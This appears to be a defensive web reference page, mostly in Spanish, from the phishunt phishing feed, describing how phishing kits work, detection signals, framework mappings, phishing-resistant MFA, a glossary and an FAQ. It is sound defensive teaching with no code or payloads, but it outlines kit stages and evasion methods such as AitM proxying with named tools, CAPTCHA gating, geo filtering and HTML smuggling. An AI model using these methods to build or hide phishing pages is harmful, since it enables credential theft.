Guía de detección de phishing
Una referencia neutral y abierta sobre cómo funcionan los kits de phishing modernos, qué señales rastrean los defensores y qué frameworks de la industria mapear.
Qué es el phishing
Definición
El phishing es un ataque de ingeniería social donde el adversario suplanta una marca, servicio o individuo de confianza para engañar al objetivo y conseguir credenciales, desplegar malware o transferir fondos.
MITRE ATT&CK lo clasifica como técnica T1566 con tres sub-técnicas.
Sub-técnicas
- T1566.001 Spearphishing Attachment - fichero armado
- T1566.002 Spearphishing Link - URL a login falso
- T1566.003 Spearphishing via Service - DM / SaaS
- T1566.004 Spearphishing Voice - vishing
Qué NO es phishing
Phishing is distinct from malware delivery (the kit may stage malware, but the technique is identity-targeted), from generic spam (which has no identity-impersonation step), and from Business Email Compromise (BEC) - which manipulates a real person's mailbox without the spoofed-domain landing page that defines phishing.
Cómo funcionan los kits
Los kits modernos encadenan cuatro etapas. Detectar en cada una alimenta señales distintas al pipeline que mantiene el feed activo de phishunt.
1. Cebo
Email, SMS (smishing), instant message or QR code (quishing) carrying a contextual hook - shipping notice, payroll, MFA reset, fake invoice.
Defender signal: SPF / DKIM / DMARC alignment, sender reputation, typosquat domain in the link.
2. Landing page
The hosted fake-login page. Today's kits are HTML / JS bundles deployed on cheap shared hosting, Telegram-bot exfil included by default.
Defender signal: brand-keyword in domain, fresh TLS cert in CT logs, asset-hash collision with a known kit, JavaScript obfuscation patterns.
3. Captura de credenciales
The form posts username + password (and any second-factor field) to an operator endpoint. Adversary-in-the-middle kits relay live to the real service to harvest the post-MFA session cookie.
Defender signal: action= attribute pointing off-domain, mismatched form-encryption, missing CSRF token.
4. Exfiltración
Telegram bot, simple email to a Gmail dropbox, or HTTP POST to a staging server. The session cookie or credential pair is then sold or replayed against the victim's enterprise SSO.
Defender signal: outbound traffic from compromised endpoints to known operator staging hosts; phishunt blocklists the staging hosts when the operator pivots through CT-visible certs.
Señales de detección
Los defensores combinan tres capas de señales. Ninguna por sí sola es suficiente; los kits actuales suelen sortear cualquiera de ellas si se usan en aislamiento.
| Capa | Qué observa | Señales típicas |
|---|---|---|
| Red | Todo lo visible antes de que la página renderice. | Certificate Transparency log streams, DNS reputation, brand-keyword lexical scoring on newly registered domains, JA3 / JA4 TLS fingerprints, MX/SPF on the lure domain. |
| Contenido | La página renderizada en sí. | Brand-asset image-hash collision, form action= off-domain, missing BIMI on lure email sender, HTML smuggling patterns, page-DOM perceptual-hash match against a known kit. |
| Comportamiento | Cómo reacciona la página ante visitantes. | Geo / IP filtering (only victim country sees real page), CAPTCHA / Turnstile gate before kit reveals itself, OAST canary-callback evidence (e.g. interactsh) when probing for SSRF. |
Frameworks de la industria
OWASP Top 10
Phishing maps primarily to A07:2021 Identification and Authentication Failures, since the kit's purpose is to defeat authentication. Anti-phishing controls also touch A05:2021 Security Misconfiguration when the impersonated site fails to enforce HSTS, secure cookies or strict CSP.
NIST SP 800-53 / 800-46
The relevant control families are AC-2 account management, IA-2 identification and authentication of organizational users, AT-2 security awareness training, and SI-3 malicious code protection. NIST SP 800-46 (Telework) calls out phishing-resistant MFA explicitly.
Árbol de técnicas MITRE ATT&CK
T1566 (Phishing) sits inside the Initial Access (TA0001) tactic. Once the credential is stolen, follow-on TTPs typically chain through TA0006 Credential Access (T1078 Valid Accounts) and TA0008 Lateral Movement. Defender mappings should include detective controls at each tactic transition, not just at T1566 itself.
MFA resistente al phishing
Los kits AitM modernos reenvían credenciales y cookies de sesión post-MFA en vivo al servicio real. SMS-OTP, OTP basado en tiempo y notificaciones push caen ante AitM. Solo MFA atado al origen lo derrota.
| Factor | ¿Resiste phishing? | Por qué / por qué no |
|---|---|---|
| SMS OTP | No | El código es transferible; el kit AitM lo reenvía al instante. También vulnerable a SIM-swap. |
| TOTP (Google Authenticator, Authy) | No | La ventana de 30 segundos sobra para que un AitM lo reenvíe. |
| Push approval (Duo, Microsoft Authenticator) | Partial | Number-matching ayuda; los prompts simples "aprobar / denegar" caen a fatiga y AitM. |
| FIDO2 / WebAuthn passkey | Yes | Reto criptográfico ligado al origen (RP ID). El dominio falso del atacante tiene un RP ID distinto, así que el autenticador se niega a firmar. |
| Smartcard / PIV | Yes | Misma propiedad de binding al origen que WebAuthn. |
Técnicas de evasión comunes
Adversary-in-the-Middle (AitM)
Kits like Evilginx, Tycoon-2FA, Modlishka reverse-proxy the real login site and capture the session cookie post-MFA. Defeats SMS / TOTP / push-approval factors.
Puertas CAPTCHA / Turnstile
Kits gate the malicious page behind a Cloudflare Turnstile or Google reCAPTCHA. Automated crawlers (and many sandboxes) fail the challenge and never see the kit; the victim does.
Filtrado Geo / IP
Server-side filters return a benign decoy page to any IP outside the victim country, ASN or specific subnet range. Detection requires fetching from the same egress as the target audience.
HTML smuggling
The lure email / page contains a JavaScript blob that Blob-reconstructs the malicious payload client-side, bypassing email-gateway content scanners that inspect attachments at rest.
Glosario
- ACME
- Automatic Certificate Management Environment - the protocol Let's Encrypt and Google Trust Services use for free / automated TLS issuance.
- AitM
- Adversary-in-the-Middle - a kit pattern that reverse-proxies the real login site to harvest the post-MFA session cookie.
- BIMI
- Brand Indicators for Message Identification - a verified-logo signal in email envelopes; an absent BIMI on a sender claiming to be a brand is a phishing tell.
- CT log
- Certificate Transparency log - a public append-only log every public CA must submit certificates to. Defenders monitor CT logs for brand-keyword domains as an early-warning signal.
- DV / OV / EV
- Certificate validation tiers: Domain Validated (proof of domain control), Organization Validated, Extended Validation. DV is the most common and the cheapest to abuse.
- HSTS
- HTTP Strict Transport Security - forces browsers to use HTTPS only. HSTS preload (the browser-baked-in list) is near-irreversible and should not be set lightly.
- JA3 / JA4
- TLS-handshake fingerprints. Phishing kits often reuse the same TLS stack across thousands of staged domains, producing recognizable fingerprints.
- MTA-STS
- SMTP MTA Strict Transport Security - mail-server analogue of HSTS. Reduces ability of an attacker to downgrade SMTP to plaintext for MITM.
- OAST
- Out-of-band Application Security Testing - canary URLs (e.g. interactsh, Burp Collaborator) that record DNS / HTTP / SMTP requests, used to confirm blind vulnerabilities.
- RP ID
- Relying Party ID in WebAuthn - the origin the authenticator binds the credential to. Phishing-resistant MFA's core property.
FAQ
Is phishunt's data CC0?
Yes. The data published through TXT, JSON, CSV feeds and the public REST API is released under Creative Commons CC0 1.0. The website code, branding and trademarks are not covered by CC0.
How fresh is phishunt's data?
The detection pipeline runs hourly and active sites are rechecked every six hours. Domains stay in the active feed only while they keep returning a phishing page; sites that go down or get cleaned up leave the feed.
How does phishunt compare to PhishTank or OpenPhish?
All three publish phishing IOCs but they target different ingest modes: PhishTank is community-curated, OpenPhish is a commercial paid feed, phishunt is detection-driven from CT logs and newly registered domains. The three feeds complement each other rather than replace each other.
How do I report a phishing site (or a false positive)?
Email [email protected] with the URL and any context. False-positive reports go to the same address; reviewed and removed within 24 hours on weekdays.
Can I integrate phishunt into my SOC tooling?
Yes. The /api/ page documents the REST endpoints (free, no auth, CC0 data). For agentic / LLM-driven workflows the MCP server at mcp.phishunt.io exposes the same data as JSON-RPC tools (see /agents/ for setup snippets).
Why "suspicious" rather than "confirmed malicious"?
phishunt favors recall over precision. Sites that pass the brand-impersonation threshold ship to the active feed without third-party confirmation. Pair with Google Safe Browsing, urlscan or VirusTotal when you need confirmed verdicts.
Referencia educativa abierta. Última actualización 2026-04-29. Sugerencias y correcciones por [email protected].